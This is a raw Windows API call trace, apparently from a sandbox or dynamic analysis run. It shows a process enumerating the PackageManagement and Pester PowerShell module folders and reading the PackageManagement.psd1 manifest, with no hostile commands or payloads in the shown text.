	[0049.859] FindClose (in: hFindFile=0x1505fab7bc0 | out: hFindFile=0x1505fab7bc0) returned 1
	[0049.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3b0) returned 1
	[0049.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d370) returned 1
	[0049.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.859] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0049.859] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x184c18cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d
	[0049.859] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x184c18cf70 | out: lpFindFileData=0x184c18cf70) returned 0x1505fab7ce0
	[0049.860] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.860] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.860] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 0
	[0049.860] FindClose (in: hFindFile=0x1505fab7ce0 | out: hFindFile=0x1505fab7ce0) returned 1
	[0049.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0049.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x184c18cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d
	[0049.860] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x184c18cf70 | out: lpFindFileData=0x184c18cf70) returned 0x1505fab73e0
	[0049.860] FindNextFileW (in: hFindFile=0x1505fab73e0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.862] FindNextFileW (in: hFindFile=0x1505fab73e0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.863] FindNextFileW (in: hFindFile=0x1505fab73e0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 0
	[0049.863] FindClose (in: hFindFile=0x1505fab73e0 | out: hFindFile=0x1505fab73e0) returned 1
	[0049.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d140) returned 1
	[0049.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0049.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45
	[0049.863] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x184c18cde0 | out: lpFindFileData=0x184c18cde0) returned 0x1505fab7260
	[0049.863] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.863] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.864] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.865] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.865] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 0
	[0049.865] FindClose (in: hFindFile=0x1505fab7260 | out: hFindFile=0x1505fab7260) returned 1
	[0049.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d090) returned 1
	[0049.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0049.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d140) returned 1
	[0049.865] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0049.865] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45
	[0049.865] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x184c18cde0 | out: lpFindFileData=0x184c18cde0) returned 0x1505fab7c20
	[0049.865] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.865] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.866] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.867] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 0
	[0049.867] FindClose (in: hFindFile=0x1505fab7c20 | out: hFindFile=0x1505fab7c20) returned 1
	[0049.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d090) returned 1
	[0049.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0049.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0049.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0049.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d170) returned 1
	[0049.867] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x184c18d250 | out: lpFileInformation=0x184c18d250*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0049.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d130) returned 1
	[0049.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0049.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0049.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45
	[0049.867] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x184c18ce40 | out: lpFindFileData=0x184c18ce40) returned 0x1505fab8880
	[0049.867] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.868] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.869] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 0
	[0049.869] FindClose (in: hFindFile=0x1505fab8880 | out: hFindFile=0x1505fab8880) returned 1
	[0049.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0f0) returned 1
	[0049.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0b0) returned 1
	[0049.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff
	[0049.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff
	[0049.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff
	[0049.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff
	[0049.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff
	[0049.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0049.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.869] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x184c18d3e0 | out: lpFileInformation=0x184c18d3e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0049.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0049.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x184c18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d
	[0049.870] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x184c18cfd0 | out: lpFindFileData=0x184c18cfd0) returned 0x1505fab7c20
	[0049.870] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.870] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.870] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 0
	[0049.870] FindClose (in: hFindFile=0x1505fab7c20 | out: hFindFile=0x1505fab7c20) returned 1
	[0049.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b
	[0049.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d370) returned 1
	[0049.870] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18d450 | out: lpFileInformation=0x184c18d450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1
	[0049.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d330) returned 1
	[0049.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b
	[0049.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d110) returned 1
	[0049.871] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x688
	[0049.871] GetFileType (hFile=0x688) returned 0x1
	[0049.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d080) returned 1
	[0049.871] GetFileType (hFile=0x688) returned 0x1
	[0049.871] ReadFile (in: hFile=0x688, lpBuffer=0x15047405b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x15047405b40*, lpNumberOfBytesRead=0x184c18d1e8*=0x5f8, lpOverlapped=0x0) returned 1
	[0049.871] ReadFile (in: hFile=0x688, lpBuffer=0x15047405078, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x15047405078*, lpNumberOfBytesRead=0x184c18d1e8*=0x0, lpOverlapped=0x0) returned 1
	[0049.871] ReadFile (in: hFile=0x688, lpBuffer=0x15047405b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x15047405b40*, lpNumberOfBytesRead=0x184c18d1e8*=0x0, lpOverlapped=0x0) returned 1
	[0049.871] CloseHandle (hObject=0x688) returned 1
	[0049.873] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff
	[0049.873] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff
	[0049.873] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff
	[0049.873] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff
	[0049.873] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff
	[0049.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0049.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x184c18cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32
	[0049.873] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x184c18cf70 | out: lpFindFileData=0x184c18cf70) returned 0x1505fab78c0
	[0049.874] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.874] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.874] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 0
	[0049.874] FindClose (in: hFindFile=0x1505fab78c0 | out: hFindFile=0x1505fab78c0) returned 1
	[0049.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0049.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x184c18cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32
	[0049.874] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x184c18cf70 | out: lpFindFileData=0x184c18cf70) returned 0x1505fab7920
	[0049.874] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.874] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.875] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 0
	[0049.875] FindClose (in: hFindFile=0x1505fab7920 | out: hFindFile=0x1505fab7920) returned 1
	[0049.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d140) returned 1
	[0049.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0049.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x184c18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38
	[0049.875] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x184c18cde0 | out: lpFindFileData=0x184c18cde0) returned 0x1505fab8220
	[0049.875] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.875] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
